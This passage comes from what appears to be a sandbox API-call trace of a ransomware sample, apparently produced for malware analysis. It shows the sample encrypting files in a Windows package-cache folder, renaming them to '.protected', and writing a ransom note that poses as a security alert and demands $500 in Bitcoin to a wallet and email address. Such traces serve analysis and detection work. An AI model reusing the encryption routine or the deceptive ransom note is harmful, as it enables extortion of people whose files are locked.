Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.protected")) returned 1 [0075.405] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Windows") returned -1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files") returned 
1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files (x86)") returned 1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="$Recycle.bin") returned 1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="System Volume Information") returned 1 [0075.405] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0075.405] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".protected") returned 0x0 [0075.405] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0075.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0075.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0075.405] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0075.406] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0075.406] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".txt") returned 0x0 [0075.406] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package 
Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0075.406] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".rar") returned 0x0 [0075.406] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0075.406] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".zip") returned 0x0 [0075.406] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.413] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.413] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.414] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.414] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0075.415] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0075.415] CloseHandle (hObject=0xd8) returned 1 [0075.415] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 148 [0075.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.protected")) returned 1 [0075.416] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0075.416] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0075.416] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 130 [0075.416] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0075.435] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.435] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0075.436] lstrlenA (lpString="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") returned 684 [0075.436] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0075.436] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.436] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0075.436] CloseHandle (hObject=0xd4) returned 1 [0075.437] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0075.437] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0075.437] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 109 [0075.437] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.438] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.438] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0075.439] lstrlenA (lpString="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") returned 684 [0075.439] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0075.439] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.439] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0075.439] CloseHandle (hObject=0xb4) returned 1 [0075.439] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0075.439] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0075.440] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt") returned 100 [0075.440] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0075.440] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.440] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0075.442] lstrlenA (lpString="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") returned 684 [0075.442] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0075.442] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.442] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0075.442] CloseHandle (hObject=0xa4) returned 1 [0075.442] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="Windows") returned -1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="Program Files") returned -1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="Program Files (x86)") returned -1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="$Recycle.bin") returned 1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="System Volume Information") returned -1 [0075.442] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 71 [0075.442] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2=".") returned 1 [0075.442] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="..") returned 1 [0075.442] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*") returned 73 [0075.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0075.443] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.443] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.443] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.443] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.443] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.443] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\.") returned 73 [0075.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.443] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.443] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.444] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.444] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.444] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.444] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\..") returned 74 [0075.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.444] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.444] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0075.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0075.444] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0075.444] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0075.444] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c 
| out: pbBuffer=0x295f12c) returned 1 [0075.444] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0075.444] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0075.589] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0075.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0075.589] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0075.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0075.589] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0075.589] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x28e, lpOverlapped=0x0) returned 1 [0075.590] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.590] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x28e, lpOverlapped=0x0) returned 1 [0075.590] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0075.590] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0075.590] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0075.590] CloseHandle (hObject=0xb4) returned 1 [0075.591] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.protected") returned 91 [0075.591] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.protected")) returned 1 [0075.622] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Windows") returned -1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Program Files") returned 1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Program Files (x86)") returned 1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="$Recycle.bin") returned 1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="System Volume Information") returned 1 [0075.622] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0075.622] StrStrIW 
(lpFirst="vcredist_x64.exe", lpSrch=".protected") returned 0x0 [0075.622] lstrcmpW (lpString1="vcredist_x64.exe", lpString2="RESTORE_FILES.txt") returned 1 [0075.622] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0075.623] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0075.623] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.624] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0075.624] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".txt") returned 0x0 [0075.624] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0075.624] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".rar") returned 0x0 [0075.624] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0075.624] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".zip") returned 0x0 [0075.624] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0075.689] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.689] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, 
